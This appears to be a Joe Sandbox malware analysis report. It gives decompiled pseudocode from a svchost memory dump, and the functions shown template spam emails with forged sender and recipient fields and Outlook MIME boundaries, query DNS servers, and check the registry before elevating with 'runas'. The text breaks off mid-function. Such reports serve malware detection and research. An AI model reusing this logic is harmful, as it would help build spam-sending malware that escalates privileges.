                                                                                • API String ID: 4293430545-3817095088
                                                                                • Opcode ID: 828b45611bfdc9fa52056eba0fa4aa6da0c732ee775372c3d438b8b136af6b01
                                                                                • Instruction ID: 5ecefecf41aee9d7550f61338a4c938fea0d47738e1d462710213283eed14ee0
                                                                                • Opcode Fuzzy Hash: 828b45611bfdc9fa52056eba0fa4aa6da0c732ee775372c3d438b8b136af6b01
                                                                                • Instruction Fuzzy Hash: 4CB18E72908229EEDF15EFA4EC45AEF77B8EF15310F200466F501E60D1EB719AA4CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012AD89 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 121timeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 96%
                                                                                			E0012AD89(void* __ecx, void* __eflags) {
				signed int _t48;
				signed int _t50;
				void* _t53;
				intOrPtr _t55;
				void* _t76;
				signed int _t77;
				void* _t81;
				CHAR* _t92;
				void* _t94;
				void* _t96;
				void* _t98;

				_t76 = __ecx;
				_t94 = _t96 - 0x74;
				GetLocalTime(_t94 + 0x50);
				SystemTimeToFileTime(_t94 + 0x50, _t94 + 0x64);
				E0012EE2A(_t76, _t94 - 0x110, 0, 0x80);
				E0012AD08(_t94 - 0x110);
				_t98 = _t96 - 0x184 + 0x10;
				if(E001230B5() == 0) {
					 *((intOrPtr*)(_t94 + 0x6c)) = "127.0.0.1";
				} else {
					_push(_t94 - 0x90);
					 *((intOrPtr*)(_t94 + 0x6c)) = E0012A7A3(_t47, _t47);
				}
				_t48 = E0012ECA5();
				_t77 = 0xe;
				_t50 = E0012ECA5();
				_t92 = "%OUTLOOK_BND_";
				 *((intOrPtr*)(_t94 + 0x70)) = (_t50 & 0x00000001) + _t48 % _t77 + 0xb;
				_t53 = E0012EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
				while(1) {
					_t103 = _t53;
					if(_t53 == 0) {
						break;
					}
					_t55 = E0012EDAC(_t53 + 0xd);
					_t81 =  *((intOrPtr*)(_t94 + 0x70)) + _t55;
					__eflags = _t81;
					 *((intOrPtr*)(_t94 + 0x60)) = _t55;
					wsprintfA(_t94 - 0x70, "----=_NextPart_%03d_%04X_%08.8lX.%08.8lX", _t55, _t81,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64));
					wsprintfA(_t94 + 0x10, "%s%d", _t92,  *((intOrPtr*)(_t94 + 0x60)));
					E0012EF7C(__eflags,  *((intOrPtr*)(_t94 + 0x7c)), _t94 + 0x10, _t94 - 0x70, 0x3e800, 0);
					_t98 = _t98 + 0x40;
					_t53 = E0012EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
				}
				wsprintfA(_t94 - 0x70, "%04x%08.8lx$%08.8lx$%08x@%s",  *((intOrPtr*)(_t94 + 0x70)) + 3,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64),  *((intOrPtr*)(_t94 + 0x6c)), _t94 - 0x110);
				E0012EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_MID", _t94 - 0x70, 0x3e800, 0);
				return E0012EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_HST", _t94 - 0x110, 0x3e800, 0);
			}














                                                                                0x0012ad89
                                                                                0x0012ad8a
                                                                                0x0012ad98
                                                                                0x0012ada6
                                                                                0x0012adba
                                                                                0x0012adc6
                                                                                0x0012adcb
                                                                                0x0012add5
                                                                                0x0012adeb
                                                                                0x0012add7
                                                                                0x0012addd
                                                                                0x0012ade6
                                                                                0x0012ade6
                                                                                0x0012adf5
                                                                                0x0012adfe
                                                                                0x0012ae03
                                                                                0x0012ae0f
                                                                                0x0012ae18
                                                                                0x0012ae1b
                                                                                0x0012ae7f
                                                                                0x0012ae81
                                                                                0x0012ae83
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012ae31
                                                                                0x0012ae3f
                                                                                0x0012ae3f
                                                                                0x0012ae43
                                                                                0x0012ae4f
                                                                                0x0012ae5e
                                                                                0x0012ae6e
                                                                                0x0012ae73
                                                                                0x0012ae7a
                                                                                0x0012ae7a
                                                                                0x0012aea5
                                                                                0x0012aeb6
                                                                                0x0012aedc

                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 0012AD98
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0012ADA6
                                                                                  • Part of subcall function 0012AD08: gethostname.WS2_32(?,00000080), ref: 0012AD1C
                                                                                  • Part of subcall function 0012AD08: lstrlenA.KERNEL32(?), ref: 0012AD60
                                                                                  • Part of subcall function 0012AD08: lstrlenA.KERNEL32(?), ref: 0012AD69
                                                                                  • Part of subcall function 0012AD08: lstrcpyA.KERNEL32(?,LocalHost), ref: 0012AD7F
                                                                                  • Part of subcall function 001230B5: gethostname.WS2_32(?,00000080), ref: 001230D8
                                                                                  • Part of subcall function 001230B5: gethostbyname.WS2_32(?), ref: 001230E2
                                                                                • wsprintfA.USER32 ref: 0012AEA5
                                                                                  • Part of subcall function 0012A7A3: inet_ntoa.WS2_32(00000000), ref: 0012A7A9
                                                                                • wsprintfA.USER32 ref: 0012AE4F
                                                                                • wsprintfA.USER32 ref: 0012AE5E
                                                                                  • Part of subcall function 0012EF7C: lstrlenA.KERNEL32(?,?,00000000,?,?), ref: 0012EF92
                                                                                  • Part of subcall function 0012EF7C: lstrlenA.KERNEL32(?), ref: 0012EF99
                                                                                  • Part of subcall function 0012EF7C: lstrlenA.KERNEL32(00000000), ref: 0012EFA0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$Timewsprintf$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
                                                                                • String ID: %04x%08.8lx$%08.8lx$%08x@%s$%OUTLOOK_BND_$%OUTLOOK_HST$%OUTLOOK_MID$%s%d$----=_NextPart_%03d_%04X_%08.8lX.%08.8lX$127.0.0.1
                                                                                • API String ID: 3631595830-1816598006
                                                                                • Opcode ID: 9f6c4ff9ece91ef88c11854328e0ba8fc0be92f2320e634623b2de578e4dd898
                                                                                • Instruction ID: c77c6e0fd21ab560b2c97acfc7f3f885d590d0093a85a1c9c2eaa10683b49b78
                                                                                • Opcode Fuzzy Hash: 9f6c4ff9ece91ef88c11854328e0ba8fc0be92f2320e634623b2de578e4dd898
                                                                                • Instruction Fuzzy Hash: 7A4111B290021CABDF25EFA0DC46EEE7BEDFF18300F144416F91592151E771D9648B51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00122DF2 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 97memorylibrarynetworkCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 55%
                                                                                			E00122DF2(intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				long _v16;
				intOrPtr _v28;
				short _v30;
				char _v32;
				struct HINSTANCE__* _t18;
				void* _t22;
				signed int _t23;
				short _t27;
				signed int _t31;
				intOrPtr* _t35;
				intOrPtr* _t37;
				CHAR* _t38;
				void* _t40;

				_t38 = "iphlpapi.dll";
				_t18 = GetModuleHandleA(_t38);
				if(_t18 == 0 || _t18 == 0xffffffff) {
					_t18 = LoadLibraryA(_t38);
				}
				if(_t18 == 0 || _t18 == 0xffffffff) {
					L18:
					return 0;
				} else {
					_t35 = GetProcAddress(_t18, "GetNetworkParams");
					if(_t35 == 0) {
						goto L18;
					}
					_t22 = HeapAlloc(GetProcessHeap(), 0, 0x4000);
					_t33 =  &_v16;
					_v8 = _t22;
					_v16 = 0x4000;
					_t23 =  *_t35(_t22,  &_v16);
					if(_t23 != 0) {
						goto L18;
					}
					_v12 = _v12 & _t23;
					_t37 = _v8 + 0x10c;
					if(_t37 == 0) {
						L17:
						HeapFree(GetProcessHeap(), 0, _v8);
						return _v12;
					} else {
						goto L8;
					}
					do {
						L8:
						_t40 = _t37 + 4;
						if(_t40 == 0) {
							goto L16;
						}
						_t27 = 2;
						_v32 = _t27;
						__imp__#9(0x35);
						_v30 = _t27;
						__imp__#11(_t40);
						_v28 = _t27;
						if(_t27 == 0 || _t27 == 0xffffffff) {
							__imp__#52(_t40);
							if(_t27 == 0) {
								goto L16;
							}
							_t27 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t27 + 0xc))))));
							_v28 = _t27;
							goto L13;
						} else {
							L13:
							if(_t27 != 0 && _t27 != 0xffffffff) {
								_t31 = E00122CEB(_t33,  &_v32, _a4);
								_pop(_t33);
								_v12 = _t31;
								if(_t31 != 0) {
									goto L17;
								}
							}
						}
						L16:
						_t37 =  *_t37;
					} while (_t37 != 0);
					goto L17;
				}
			}


















                                                                                0x00122dfb
                                                                                0x00122e01
                                                                                0x00122e09
                                                                                0x00122e11
                                                                                0x00122e11
                                                                                0x00122e19
                                                                                0x00122ef1
                                                                                0x00000000
                                                                                0x00122e28
                                                                                0x00122e34
                                                                                0x00122e38
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122e4f
                                                                                0x00122e55
                                                                                0x00122e5a
                                                                                0x00122e5d
                                                                                0x00122e60
                                                                                0x00122e64
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122e6d
                                                                                0x00122e70
                                                                                0x00122e76
                                                                                0x00122ede
                                                                                0x00122ee6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122e78
                                                                                0x00122e78
                                                                                0x00122e78
                                                                                0x00122e7d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122e81
                                                                                0x00122e84
                                                                                0x00122e88
                                                                                0x00122e8f
                                                                                0x00122e93
                                                                                0x00122e99
                                                                                0x00122e9e
                                                                                0x00122ea6
                                                                                0x00122eae
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122eb5
                                                                                0x00122eb7
                                                                                0x00000000
                                                                                0x00122eba
                                                                                0x00122eba
                                                                                0x00122ebc
                                                                                0x00122eca
                                                                                0x00122ed0
                                                                                0x00122ed1
                                                                                0x00122ed6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122ed6
                                                                                0x00122ebc
                                                                                0x00122ed8
                                                                                0x00122ed8
                                                                                0x00122eda
                                                                                0x00000000
                                                                                0x00122e78

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(iphlpapi.dll,74D0EA30,?,000DBBA0,?,00000000,00122F0F,?,001220FF,00132000), ref: 00122E01
                                                                                • LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,00122F0F,?,001220FF,00132000), ref: 00122E11
                                                                                • GetProcAddress.KERNEL32(00000000,GetNetworkParams), ref: 00122E2E
                                                                                • GetProcessHeap.KERNEL32(00000000,00004000,?,00000000,00122F0F,?,001220FF,00132000), ref: 00122E4C
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00122F0F,?,001220FF,00132000), ref: 00122E4F
                                                                                • htons.WS2_32(00000035), ref: 00122E88
                                                                                • inet_addr.WS2_32(?), ref: 00122E93
                                                                                • gethostbyname.WS2_32(?), ref: 00122EA6
                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00122F0F,?,001220FF,00132000), ref: 00122EE3
                                                                                • HeapFree.KERNEL32(00000000,?,00000000,00122F0F,?,001220FF,00132000), ref: 00122EE6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$Process$AddressAllocFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
                                                                                • String ID: GetNetworkParams$iphlpapi.dll
                                                                                • API String ID: 929413710-2099955842
                                                                                • Opcode ID: 32ad65aba048c85fd81ee8a259d2d00032404fd58fced7cd75eabd4ef10416ff
                                                                                • Instruction ID: 174e989b853b063bbd13ace1414e122980f71bffa2ee901447f8b2a82185527e
                                                                                • Opcode Fuzzy Hash: 32ad65aba048c85fd81ee8a259d2d00032404fd58fced7cd75eabd4ef10416ff
                                                                                • Instruction Fuzzy Hash: E531E831A00619BBDF119FB8AC58AAF77B8AF08760F160115F914E72A0D730DD91AB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00129326 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 284registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 77%
                                                                                			E00129326(void* __ecx, void* __edx) {
				void* __ebx;
				char _t88;
				void* _t89;
				int _t92;
				void* _t96;
				signed int _t97;
				signed int _t100;
				signed int _t103;
				char* _t106;
				char* _t111;
				signed int _t112;
				char* _t116;
				signed int _t117;
				int _t119;
				void* _t146;
				signed int _t155;
				int _t161;
				signed int _t165;
				signed int _t167;
				void* _t168;
				void* _t170;
				void* _t172;
				void* _t173;
				void* _t175;
				void* _t176;

				_t146 = __ecx;
				_t168 = _t170 - 0x60;
				E00121910(0x19bc);
				 *(_t168 - 0x58) = 0x9c;
				if(GetVersionExA(_t168 - 0x58) == 0) {
					 *(_t168 - 0x4c) =  *(_t168 - 0x4c) & 0x00000000;
					_t9 = _t168 + 0x58;
					 *_t9 =  *(_t168 + 0x58) & 0x00000000;
					__eflags =  *_t9;
				} else {
					 *(_t168 + 0x58) = ( *(_t168 - 0x54) << 4) +  *((intOrPtr*)(_t168 - 0x50));
				}
				_t88 = GetModuleFileNameA(GetModuleHandleA(0), _t168 - 0x15c, 0x104);
				if(_t88 == 0) {
					 *(_t168 - 0x15c) = _t88;
				}
				_push( *((intOrPtr*)(_t168 + 0x70)));
				_t89 = _t168 - 0x15c;
				if( *(_t168 + 0x78) == 0) {
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push(_t89);
					_push( *((intOrPtr*)(_t168 + 0x68)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x6c)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_t92 = wsprintfA(_t168 - 0x95c, E00122544(0x1322f8,  &E00130918, 0xbd, 0xe4, 0xc8));
					_t172 = _t170 + 0x40;
				} else {
					_push(_t89);
					_push( *((intOrPtr*)(_t168 + 0x68)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x70)));
					_push( *((intOrPtr*)(_t168 + 0x74)));
					_push( *((intOrPtr*)(_t168 + 0x6c)));
					_t92 = wsprintfA(_t168 - 0x95c, E00122544(0x1322f8, 0x1309d8, 0x4d, 0xe4, 0xc8));
					_t172 = _t170 + 0x38;
				}
				 *(_t168 + 0x78) = _t92;
				E0012EE2A(_t146, 0x1322f8, 0, 0x100);
				_t173 = _t172 + 0xc;
				if( *(_t168 + 0x58) >= 0x60 &&  *((intOrPtr*)(_t168 + 0x7c)) != 0) {
					E0012EF00(_t168 - 0x15c, E00126CC9(_t146));
					E0012EF1E(_t168 - 0x15c, E00122544(0x1322f8,  &E0013090C, 0xc, 0xe4, 0xc8));
					_push(_t168 - 0x15c);
					wsprintfA(_t168 +  *(_t168 + 0x78) - 0x95c, E00122544(0x1322f8,  &E00130888, 0x82, 0xe4, 0xc8));
					E0012EE2A(_t146, 0x1322f8, 0, 0x100);
					_t173 = _t173 + 0x50;
				}
				 *(_t168 + 0x78) =  *(_t168 + 0x78) & 0x00000000;
				 *(_t168 + 0x5c) = E00126EDD();
				if( *(_t168 + 0x58) < 0x60) {
					_t165 =  *(_t168 + 0x78);
					_t161 = 0;
					__eflags = 0;
					L33:
					__eflags =  *(_t168 + 0x5c) - _t161;
					if( *(_t168 + 0x5c) == _t161) {
						L38:
						_push(_t168 - 0x95c);
						_push(_t161);
						L39:
						_t96 = E001291EB();
						__eflags =  *0x132180 - _t161; // 0x0
						if(__eflags != 0) {
							 *0x132180 =  *0x132180 | _t165;
							__eflags =  *0x132180;
						}
						__eflags = _t96 - 0x2a;
						_t81 = _t96 == 0x2a;
						__eflags = _t81;
						_t97 = 0 | _t81;
						L42:
						return _t97;
					}
					_t100 = E00121820(_t168 + 0x54, _t168 + 0x78);
					__eflags = _t100;
					if(_t100 != 0) {
						_push(_t168 - 0x95c);
						_push("runas");
						goto L39;
					}
					_t103 =  *(_t168 + 0x78) | 0x61040000;
					__eflags = _t103;
					 *0x132180 = _t103;
					 *0x13217c =  *(_t168 + 0x54);
					if(_t103 != 0) {
						 *0x132180 = _t103 | _t165;
					}
					L31:
					_t97 = 0;
					goto L42;
				}
				 *(_t168 + 0x4c) = 4;
				 *(_t168 + 0x44) = 5;
				 *(_t168 + 0x48) = 1;
				_t106 = E00122544(0x1322f8,  &E0013084C, 0x3a, 0xe4, 0xc8);
				_t175 = _t173 + 0x14;
				if(RegOpenKeyExA(0x80000002, _t106, 0, 0x101, _t168 + 0x50) == 0) {
					_t111 = E00122544(0x1322f8, 0x130830, 0x1b, 0xe4, 0xc8);
					_t176 = _t175 + 0x14;
					_t112 = RegQueryValueExA( *(_t168 + 0x50), _t111, 0, _t168 + 0x54, _t168 + 0x44, _t168 + 0x4c);
					__eflags = _t112;
					if(_t112 == 0) {
						_t116 = E00122544(0x1322f8, 0x130818, 0x16, 0xe4, 0xc8);
						_t176 = _t176 + 0x14;
						_t117 = RegQueryValueExA( *(_t168 + 0x50), _t116, 0, _t168 + 0x54, _t168 + 0x48, _t168 + 0x4c);
						__eflags = _t117;
						if(_t117 != 0) {
							 *(_t168 + 0x78) = 0x3000;
						}
					} else {
						 *(_t168 + 0x78) = 0x2000;
					}
					RegCloseKey( *(_t168 + 0x50));
					_t165 =  *(_t168 + 0x78);
				} else {
					_t165 = 0x1000;
				}
				_t161 = 0;
				if( *(_t168 + 0x44) != 0 ||  *(_t168 + 0x48) != 0) {
					if( *(_t168 + 0x5c) <= _t161) {
						goto L38;
					}
					_t119 =  *(_t168 - 0x4c);
					if( *(_t168 + 0x58) < 0x61 || _t119 < 0x1db0) {
						 *0x13217c = _t119;
						_t167 = _t165 | 0x61040106;
						__eflags = _t167;
						goto L30;
					} else {
						if(E0012F0E4(_t168 - 0x95c, _t168 - 0x195c, 0x800) == 0) {
							 *0x13217c = _t161;
							_t167 = _t165 | 0x61040107;
							L30:
							 *0x132180 = _t167;
							goto L31;
						}
						_t97 = E001218E0(0xc8, _t168 - 0x195c, _t168 + 0x5c, _t168 + 0x78);
						if(_t97 == _t161) {
							_t155 =  *(_t168 + 0x78) | 0x61040000;
							 *0x132180 = _t155;
							 *0x13217c =  *(_t168 + 0x5c);
							if(_t155 != 0) {
								 *0x132180 = _t155 | _t165;
							}
						}
						goto L42;
					}
				} else {
					goto L33;
				}
			}




























                                                                                0x00129326
                                                                                0x00129327
                                                                                0x00129330
                                                                                0x00129339
                                                                                0x00129348
                                                                                0x00129358
                                                                                0x0012935c
                                                                                0x0012935c
                                                                                0x0012935c
                                                                                0x0012934a
                                                                                0x00129353
                                                                                0x00129353
                                                                                0x00129375
                                                                                0x0012937d
                                                                                0x0012937f
                                                                                0x0012937f
                                                                                0x0012938c
                                                                                0x00129394
                                                                                0x001293a2
                                                                                0x001293d9
                                                                                0x001293dc
                                                                                0x001293dd
                                                                                0x001293e0
                                                                                0x001293e3
                                                                                0x001293e6
                                                                                0x001293e9
                                                                                0x001293ec
                                                                                0x0012940c
                                                                                0x00129412
                                                                                0x001293a4
                                                                                0x001293a4
                                                                                0x001293a5
                                                                                0x001293a8
                                                                                0x001293ab
                                                                                0x001293ae
                                                                                0x001293b1
                                                                                0x001293ce
                                                                                0x001293d4
                                                                                0x001293d4
                                                                                0x0012941d
                                                                                0x00129420
                                                                                0x00129425
                                                                                0x0012942c
                                                                                0x00129441
                                                                                0x0012945d
                                                                                0x0012946b
                                                                                0x0012948d
                                                                                0x0012949b
                                                                                0x001294a0
                                                                                0x001294a0
                                                                                0x001294a3
                                                                                0x001294b0
                                                                                0x001294b3
                                                                                0x0012962f
                                                                                0x00129632
                                                                                0x00129632
                                                                                0x00129634
                                                                                0x00129634
                                                                                0x00129637
                                                                                0x0012967b
                                                                                0x00129681
                                                                                0x00129682
                                                                                0x00129683
                                                                                0x00129683
                                                                                0x0012968a
                                                                                0x00129690
                                                                                0x00129692
                                                                                0x00129692
                                                                                0x00129692
                                                                                0x0012969a
                                                                                0x0012969d
                                                                                0x0012969d
                                                                                0x001296a0
                                                                                0x001296a2
                                                                                0x001296a9
                                                                                0x001296a9
                                                                                0x00129641
                                                                                0x00129648
                                                                                0x0012964a
                                                                                0x00129673
                                                                                0x00129674
                                                                                0x00000000
                                                                                0x00129674
                                                                                0x00129652
                                                                                0x00129652
                                                                                0x00129657
                                                                                0x0012965c
                                                                                0x00129662
                                                                                0x00129666
                                                                                0x00129666
                                                                                0x0012962b
                                                                                0x0012962b
                                                                                0x00000000
                                                                                0x0012962b
                                                                                0x001294ce
                                                                                0x001294d5
                                                                                0x001294dc
                                                                                0x001294e3
                                                                                0x001294e8
                                                                                0x001294f9
                                                                                0x0012951a
                                                                                0x0012951f
                                                                                0x00129526
                                                                                0x0012952c
                                                                                0x0012952e
                                                                                0x00129551
                                                                                0x00129556
                                                                                0x0012955d
                                                                                0x00129563
                                                                                0x00129565
                                                                                0x00129567
                                                                                0x00129567
                                                                                0x00129530
                                                                                0x00129530
                                                                                0x00129530
                                                                                0x00129571
                                                                                0x00129577
                                                                                0x001294fb
                                                                                0x001294fb
                                                                                0x001294fb
                                                                                0x0012957a
                                                                                0x0012957f
                                                                                0x0012958d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00129597
                                                                                0x0012959a
                                                                                0x0012961a
                                                                                0x0012961f
                                                                                0x0012961f
                                                                                0x00000000
                                                                                0x001295a3
                                                                                0x001295c0
                                                                                0x0012960c
                                                                                0x00129612
                                                                                0x00129625
                                                                                0x00129625
                                                                                0x00000000
                                                                                0x00129625
                                                                                0x001295d1
                                                                                0x001295db
                                                                                0x001295e7
                                                                                0x001295ed
                                                                                0x001295f3
                                                                                0x001295f9
                                                                                0x00129601
                                                                                0x00129601
                                                                                0x001295f9
                                                                                0x00000000
                                                                                0x001295db
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • GetVersionExA.KERNEL32(?,?,00129DD7,?,00000022,?,?,00000000,00000001), ref: 00129340
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,00129DD7,?,00000022,?,?,00000000,00000001), ref: 0012936E
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00129DD7,?,00000022,?,?,00000000,00000001), ref: 00129375
                                                                                • wsprintfA.USER32 ref: 001293CE
                                                                                • wsprintfA.USER32 ref: 0012940C
                                                                                • wsprintfA.USER32 ref: 0012948D
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 001294F1
                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00129526
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00129571
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
                                                                                • String ID: runas
                                                                                • API String ID: 3696105349-4000483414
                                                                                • Opcode ID: 346b1dd0f00313d5d054740cd60c6d58b4274f46b67643b5db7c77e9ad18d414
                                                                                • Instruction ID: 16d4e71810100553a555e71b56e6dea02dfa5f5f5e69c742fe9864fbe9bf5eb8
                                                                                • Opcode Fuzzy Hash: 346b1dd0f00313d5d054740cd60c6d58b4274f46b67643b5db7c77e9ad18d414
                                                                                • Instruction Fuzzy Hash: 3CA17EB2900218EFEB25DFA5EC85FDE3BACEB18740F104066FA0596151E775D994CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012B3C5 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 78%
                                                                                			E0012B3C5(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v132;
				void* _t46;
				char* _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t76;
				void* _t77;

				E00125CE1(_a4, 0x3e800, _a16, 0, 0);
				E0012EF00( &_v132, "%FROM_EMAIL");
				E00125CE1( &_v132, 0x64, _a16, 0, 0);
				_t71 = E0012ED03( &_v132, 0x40);
				_t77 = _t76 + 0x38;
				_t83 = _t71;
				if(_t71 != 0) {
					_t7 = _t71 + 1; // 0x1
					E0012EF7C(_t83, _a4, "%FROM_DOMAIN", _t7, 0x3e800, 0);
					 *_t71 = 0;
					E0012EF7C(_t83, _a4, "%FROM_USER",  &_v132, 0x3e800, 0);
					_t77 = _t77 + 0x28;
				}
				_t72 = _a12;
				E0012EF7C(_t83, _a4, "%TO_DOMAIN",  *((intOrPtr*)(_t72 + 0xc)), 0x3e800, 0);
				wsprintfA( &_v132, "%s@%s",  *((intOrPtr*)(_t72 + 8)),  *((intOrPtr*)(_t72 + 0xc)));
				E0012EF7C(_t83, _a4, "%TO_EMAIL",  &_v132, 0x3e800, 0);
				_t73 = _a4;
				E0012EF7C(_t83, _t73, "%TO_USER",  *((intOrPtr*)(_t72 + 4)), 0x3e800, 0);
				_t46 = E0012F0CB( &_v132);
				_push(0);
				_push( &_v132);
				_push(_t46);
				E0012F133();
				E0012EF7C(_t83, _t73, "%TO_HASH",  &_v132, 0x3e800, 0);
				_push(_t73);
				E0012AD89( &_v132, _t83);
				E0012B211(0,  &_v132, 0);
				E0012EF7C(_t83, _t73, "%DATE",  &_v132, 0x3e800, 0);
				E0012B211(0,  &_v132, 5);
				E0012EF7C(_t83, _t73, "%P5DATE",  &_v132, 0x3e800, 0);
				E0012B211(0,  &_v132, 0xfffffffb);
				E0012EF7C(_t83, _t73, "%M5DATE",  &_v132, 0x3e800, 0);
				_t75 = _a8;
				 *((char*)(E0012AEDD(_t75, _t73, 0x3e800) + _t75)) = 0;
				return _t75;
			}











                                                                                0x0012b3e1
                                                                                0x0012b3ef
                                                                                0x0012b3ff
                                                                                0x0012b40f
                                                                                0x0012b411
                                                                                0x0012b414
                                                                                0x0012b416
                                                                                0x0012b41a
                                                                                0x0012b426
                                                                                0x0012b439
                                                                                0x0012b43b
                                                                                0x0012b440
                                                                                0x0012b440
                                                                                0x0012b443
                                                                                0x0012b453
                                                                                0x0012b467
                                                                                0x0012b47b
                                                                                0x0012b485
                                                                                0x0012b48e
                                                                                0x0012b49a
                                                                                0x0012b49f
                                                                                0x0012b4a3
                                                                                0x0012b4a4
                                                                                0x0012b4a5
                                                                                0x0012b4b6
                                                                                0x0012b4bb
                                                                                0x0012b4bc
                                                                                0x0012b4c7
                                                                                0x0012b4d8
                                                                                0x0012b4e7
                                                                                0x0012b4f8
                                                                                0x0012b504
                                                                                0x0012b515
                                                                                0x0012b51e
                                                                                0x0012b52b
                                                                                0x0012b534

                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 0012B467
                                                                                  • Part of subcall function 0012EF7C: lstrlenA.KERNEL32(?,?,00000000,?,?), ref: 0012EF92
                                                                                  • Part of subcall function 0012EF7C: lstrlenA.KERNEL32(?), ref: 0012EF99
                                                                                  • Part of subcall function 0012EF7C: lstrlenA.KERNEL32(00000000), ref: 0012EFA0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$wsprintf
                                                                                • String ID: %DATE$%FROM_DOMAIN$%FROM_EMAIL$%FROM_USER$%M5DATE$%P5DATE$%TO_DOMAIN$%TO_EMAIL$%TO_HASH$%TO_USER$%s@%s
                                                                                • API String ID: 1220175532-2340906255
                                                                                • Opcode ID: c44c77db0b8397b16c6f5eb57f92ece4f68dabb132fddbf1763d0fa47ce51086
                                                                                • Instruction ID: ad58d7f09184e78166d81a0cc0c643094abd6aef95ec88d9dadc702e2ef6048c
                                                                                • Opcode Fuzzy Hash: c44c77db0b8397b16c6f5eb57f92ece4f68dabb132fddbf1763d0fa47ce51086
                                                                                • Instruction Fuzzy Hash: 66416DB254022C7EEF01ABA4EDC2CFF7BACEF59748F140115F904A2142DB30AE2597A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00122011 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 160COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 96%
                                                                                			E00122011() {
				long _t35;
				void* _t45;
				intOrPtr _t47;
				void* _t51;
				char* _t53;
				char* _t58;
				intOrPtr _t96;
				signed int _t102;
				signed int _t103;
				void* _t104;
				void* _t122;

				if(( *0x1322f4 & 0x00000001) == 0) {
